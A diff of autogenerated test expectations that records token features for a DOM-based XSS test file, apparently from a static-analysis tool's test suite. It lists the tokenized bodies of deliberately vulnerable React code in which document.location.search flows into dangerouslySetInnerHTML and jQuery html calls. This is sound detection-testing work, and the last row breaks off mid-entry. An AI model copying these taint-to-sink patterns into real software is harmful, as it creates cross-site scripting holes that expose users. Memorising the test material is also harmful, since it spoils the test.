URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:245:20:248:9 | exceptional return of constructor of class C3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:245:20:248:9 | exceptional return of constructor of class C3 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:245:20:248:9 | exceptional return of constructor of class C3 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:245:20:248:9 | exceptional return of constructor of class C3 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:245:20:248:9 | return of constructor of class C3 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:245:20:248:9 | return of constructor of class C3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:245:20:248:9 | return of constructor of class C3 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:245:20:248:9 | return of constructor of class C3 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:245:20:248:9 | return of constructor of class C3 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:245:21:245:25 | props | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:245:21:245:25 | props | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:245:21:245:25 | props | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:245:21:245:25 | props | contextSurroundingFunctionParameters | ()\n(props) | +| autogenerated/Xss/DomBasedXss/tst.js:245:21:245:25 | props | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:245:21:245:25 | props | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:245:21:245:25 | props | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:245:21:245:25 | props | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:245:21:245:25 | props | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:245:21:245:25 | props | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:246:13:246:17 | super | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:246:13:246:17 | super | contextSurroundingFunctionParameters | ()\n(props) | +| autogenerated/Xss/DomBasedXss/tst.js:246:13:246:17 | super | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:246:13:246:17 | super | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:246:13:246:17 | super | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:246:13:246:24 | exceptional return of super(props) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:246:13:246:24 | exceptional return of super(props) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:246:13:246:24 | exceptional return of super(props) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:246:13:246:24 | exceptional return of super(props) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:246:13:246:24 | exceptional return of super(props) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:246:13:246:24 | super(props) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:246:13:246:24 | super(props) | contextSurroundingFunctionParameters | ()\n(props) | +| autogenerated/Xss/DomBasedXss/tst.js:246:13:246:24 | super(props) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:246:13:246:24 | super(props) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:246:13:246:24 | super(props) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:246:19:246:23 | props | CalleeFlexibleAccessPath | super | | autogenerated/Xss/DomBasedXss/tst.js:246:19:246:23 | props | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:246:19:246:23 | props | calleeImports | | @@ -17050,18 +118255,247 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:246:19:246:23 | props | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | | autogenerated/Xss/DomBasedXss/tst.js:246:19:246:23 | props | enclosingFunctionName | react | | autogenerated/Xss/DomBasedXss/tst.js:246:19:246:23 | props | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:247:13:247:16 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:247:13:247:16 | this | contextSurroundingFunctionParameters | ()\n(props) | +| autogenerated/Xss/DomBasedXss/tst.js:247:13:247:16 | this | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:247:13:247:16 | this | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:247:13:247:16 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:247:13:247:22 | this.state | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:247:13:247:22 | this.state | contextSurroundingFunctionParameters | ()\n(props) | +| autogenerated/Xss/DomBasedXss/tst.js:247:13:247:22 | this.state | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:247:13:247:22 | this.state | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:247:13:247:22 | this.state | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:247:13:247:35 | this.st ... Tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:247:13:247:35 | this.st ... Tainted | contextSurroundingFunctionParameters | ()\n(props) | +| autogenerated/Xss/DomBasedXss/tst.js:247:13:247:35 | this.st ... Tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:247:13:247:35 | this.st ... Tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:247:13:247:35 | this.st ... Tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:247:13:247:55 | this.st ... Tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:247:13:247:55 | this.st ... Tainted | contextSurroundingFunctionParameters | ()\n(props) | +| autogenerated/Xss/DomBasedXss/tst.js:247:13:247:55 | this.st ... Tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:247:13:247:55 | this.st ... Tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:247:13:247:55 | this.st ... Tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:247:18:247:22 | state | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:247:18:247:22 | state | contextSurroundingFunctionParameters | ()\n(props) | +| autogenerated/Xss/DomBasedXss/tst.js:247:18:247:22 | state | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:247:18:247:22 | state | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:247:18:247:22 | state | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:247:24:247:35 | stateTainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:247:24:247:35 | stateTainted | contextSurroundingFunctionParameters | ()\n(props) | +| autogenerated/Xss/DomBasedXss/tst.js:247:24:247:35 | stateTainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:247:24:247:35 | stateTainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:247:24:247:35 | stateTainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:247:39:247:43 | props | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:247:39:247:43 | props | contextSurroundingFunctionParameters | ()\n(props) | +| autogenerated/Xss/DomBasedXss/tst.js:247:39:247:43 | props | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:247:39:247:43 | props | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:247:39:247:43 | props | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:247:39:247:55 | props.propTainted | assignedToPropName | stateTainted | +| autogenerated/Xss/DomBasedXss/tst.js:247:39:247:55 | props.propTainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:247:39:247:55 | props.propTainted | contextSurroundingFunctionParameters | ()\n(props) | +| autogenerated/Xss/DomBasedXss/tst.js:247:39:247:55 | props.propTainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 